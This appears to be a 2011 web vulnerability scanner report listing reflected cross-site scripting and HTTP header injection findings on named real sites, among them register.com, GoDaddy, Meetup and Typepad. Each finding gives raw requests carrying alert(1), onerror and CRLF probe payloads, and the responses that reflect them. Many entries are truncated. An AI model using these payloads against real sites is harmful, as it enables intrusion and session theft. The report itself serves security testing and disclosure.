HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:35:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 18528 Content-Type: text/html ACCEPT-RANGES: none <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Microcad.ca | Sho ...[SNIP]... <a href='/cart/remove/1542d'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /pixel/TL4HVZJAKBDON |
GET /pixel/b60f6%0d%0aefd8c279903/GBRCJV675BABRAPIIGSPD6 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __adroll=a93684bbe30 |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Sat, 03 Sep 2011 21:40:01 GMT Connection: keep-alive Set-Cookie: __adroll=a93684bbe30 Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/pixel efd8c279903/GBRCJV675BABRAPIIGSPD6 Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /pixel/TL4HVZJAKBDON |
GET /pixel/TL4HVZJAKBDON Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __adroll=a93684bbe30 |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Sat, 03 Sep 2011 21:40:13 GMT Connection: keep-alive Set-Cookie: __adroll=a93684bbe30 Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com 99e4b85b399/pixel.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wunderground |
Path: | /dotset.php |
GET /dotset.php?id=10dc5%0d%0a0e6b87e611&t=1 HTTP/1.1 Host: www.wunderground.com Proxy-Connection: keep-alive Referer: http://login.dotomi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:40:34 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-Powered-By: PHP/4.4.0 Set-Cookie: dottag.10dc5 0e6b87e611=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: must-revalidate Connection: close Content-Type: image/gif Content-Length: 43 GIF89a.............!..... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wunderground |
Path: | /dotset.php |
GET /dotset.php?id=42/613a1%0d%0abc7451b72e2&t=1 HTTP/1.1 Host: www.wunderground.com Proxy-Connection: keep-alive Referer: http://login.dotomi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:40:34 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-Powered-By: PHP/4.4.0 Set-Cookie: dottag.42/613a1 bc7451b72e2=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: must-revalidate Connection: close Content-Type: image/gif Content-Length: 43 GIF89a.............!..... |
Severity: | High |
Confidence: | Certain |
Host: | http://feeds.feedburner |
Path: | /~s/meetup |
GET /~s/meetup?i=http%3A%2F Host: feeds.feedburner.com Proxy-Connection: keep-alive Referer: http://meetupblog.meetup User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=UTF-8 Date: Sat, 03 Sep 2011 13:12:39 GMT Expires: Sat, 03 Sep 2011 13:12:39 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 729 Server: GSE var fStartPost=1;if(window ...[SNIP]... window.feedburner ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://omnituremarketing |
Path: | /m2/omnituremarketing |
GET /m2/omnituremarketing Host: omnituremarketing.tt User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.omniture.com |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 135 Date: Sat, 03 Sep 2011 14:44:41 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://omnituremarketing |
Path: | /m2/omnituremarketing/sc |
GET /m2/omnituremarketing/sc Host: omnituremarketing.tt User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.omniture.com |
HTTP/1.1 200 OK Content-Length: 190 Date: Sat, 03 Sep 2011 14:45:51 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://omnituremarketing |
Path: | /m2/omnituremarketing/sc |
GET /m2/omnituremarketing/sc Host: omnituremarketing.tt User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.omniture.com |
HTTP/1.1 200 OK Content-Length: 187 Date: Sat, 03 Sep 2011 14:45:53 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://registercom.tt |
Path: | /m2/registercom/sc |
GET /m2/registercom/sc Host: registercom.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi_holtihx7Bhabx7Dhx7F= |
HTTP/1.1 200 OK Content-Length: 264 Date: Sat, 03 Sep 2011 21:36:20 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://registercom.tt |
Path: | /m2/registercom/sc |
GET /m2/registercom/sc Host: registercom.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi_holtihx7Bhabx7Dhx7F= |
HTTP/1.1 200 OK Content-Length: 260 Date: Sat, 03 Sep 2011 21:36:30 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://s29.sitemeter.com |
Path: | /js/counter.asp |
GET /js/counter.asp?site Host: s29.sitemeter.com Proxy-Connection: keep-alive Referer: http://frankgruber.me User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Sat, 03 Sep 2011 13:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA Content-Length: 7318 Content-Type: application/x-javascript Expires: Sat, 03 Sep 2011 13:27:13 GMT Cache-control: private // Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServe ...[SNIP]... .addEventListener(sEvent, func, false); else if (obj.attachEvent) obj.attachEvent( "on"+sEvent, func ); else return false; return true; } } SiteMeter.init( var g_sLastCodeName = 's29fjgruberd44ca';alert // ]]> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s29.sitemeter.com |
Path: | /js/counter.js |
GET /js/counter.js?site Host: s29.sitemeter.com Proxy-Connection: keep-alive Referer: http://frankgruber.me User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Sat, 03 Sep 2011 13:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA Content-Length: 7318 Content-Type: application/x-javascript Expires: Sat, 03 Sep 2011 13:27:13 GMT Cache-control: private // Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServe ...[SNIP]... .addEventListener(sEvent, func, false); else if (obj.attachEvent) obj.attachEvent( "on"+sEvent, func ); else return false; return true; } } SiteMeter.init( var g_sLastCodeName = 's29fjgruber880a1';alert // ]]> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.godaddy.com |
Path: | /external/json/PcSetData |
GET /external/json/PcSetData Host: www.godaddy.com Proxy-Connection: keep-alive Referer: http://www.godaddy.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/javascript, application/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private,max-age=0 Content-Type: text/javascript; charset=utf-8 Expires: Wed, 01 Jan 1997 12:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sat, 03 Sep 2011 21:47:19 GMT Content-Length: 71 pcj_setdatac5f83<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://www.meetup.com |
Path: | /api/ |
GET /api/?method=getAler Host: www.meetup.com Proxy-Connection: keep-alive Referer: http://www.meetup.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MEETUP_MEMBER=id=0&status |
HTTP/1.1 403 Forbidden Date: Sat, 03 Sep 2011 13:11:49 GMT Server: Apache-Coyote/1.1 Expires: 0 X-Meetup-server: app16.int.meetup.com Content-Type: application/json;charset Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 112 Connection: close {"UNKNOWN":"[BAD METHOD] Can't find method \"getAlertTopicStats94cc7<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://www.microcad.ca |
Path: | /cart/add/ |
POST /cart/add/ HTTP/1.1 Host: www.microcad.ca Proxy-Connection: keep-alive Referer: http://www.microcad.ca Content-Length: 31 Cache-Control: max-age=0 Origin: http://www.microcad.ca User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: public=mrff84dil681s quantity=1&productid |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:36:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 18701 Content-Type: text/html ACCEPT-RANGES: none <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Microcad.ca | Sho ...[SNIP]... <a href='/cart/remove ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /css/home-optimized.css |
GET /css59ae9"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:34:56 GMT HostName: atleuapp01.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22792 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /domain/searchresults |
GET /domaine87eb"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 22:14:06 GMT HostName: atleuapp04.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22798 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /domain/searchresults |
GET /domain/searchresults Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 22:14:19 GMT HostName: atleuapp04.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22798 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /favicon.ico |
GET /favicon.icod8565"%3balert(1)/ Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com Host: www.register.com Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:36:48 GMT HostName: atleuapp02.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22770 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /font/vag-bold.ttf |
GET /font41cfd"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:33:09 GMT HostName: atleuapp02.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22782 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /font/vag-bold.woff |
GET /fonte0d15"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:34:38 GMT HostName: atleuapp01.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22784 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /images/sn/hp.xml |
GET /images593a2"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:37:36 GMT HostName: atleuapp02.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22780 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /js/aop-attach.js |
GET /js7da06"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:34:18 GMT HostName: atleuapp02.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22780 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /js/homepage-optimized.js |
GET /jsab187"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:35:35 GMT HostName: atleuapp01.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22796 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /js/jquery-1.3.2.min.js |
GET /jsc2708"%3balert(1)/ Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 21:35:12 GMT HostName: atleuapp01.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22792 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /unauthenticated_session |
GET /unauthenticated_session Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 404 Not Found Date: Sat, 03 Sep 2011 22:15:09 GMT HostName: atleuapp04.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 22820 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <script type="text/javascript"> aopinfo={showOnAbandon </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.typepad.com |
Path: | /services/toolbar |
GET /services/toolbar?blog_id Host: www.typepad.com Proxy-Connection: keep-alive Referer: http://meetupblog.meetup User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 200 OK Date: Sat, 03 Sep 2011 13:13:20 GMT Server: Apache X-Webserver: oak-tp-app004 Cache-Control: private Pragma: no-cache Vary: cookie,negotiate,accept Content-Language: en Content-Length: 14887 Content-Type: text/html; charset=utf-8 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... lorAnim = YAHOO.util.ColorAnim, Easing = YAHOO.util.Easing, Cookie = YAHOO.util.Cookie, TPToolbar = {}; TPToolbar = { params: { autofollowed: 0b29d9;alert(1)/ blog_user_xid: '6p011571d38234970b', display: 0, entry_xid: '', logged_in: 0, safe_to_modify_body: '0', permal ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | / |
GET / HTTP/1.1 Host: www.register.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:32:08 GMT HostName: atleuapp02.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Cache-Control: no-cache Pragma: no-cache Set-Cookie: JSESSIONID=7F95BBDBD P3P: policyref="http://www Content-Type: text/html;charset=ISO Set-Cookie: TSfd06f3=93c9a40203e Vary: Accept-Encoding, User-Agent Content-Length: 30175 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... prod="";s.products=prod /*for the T&T integration*/ mboxLoadSCPlugin(s); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code ...[SNIP]... |
Severity: | Low |
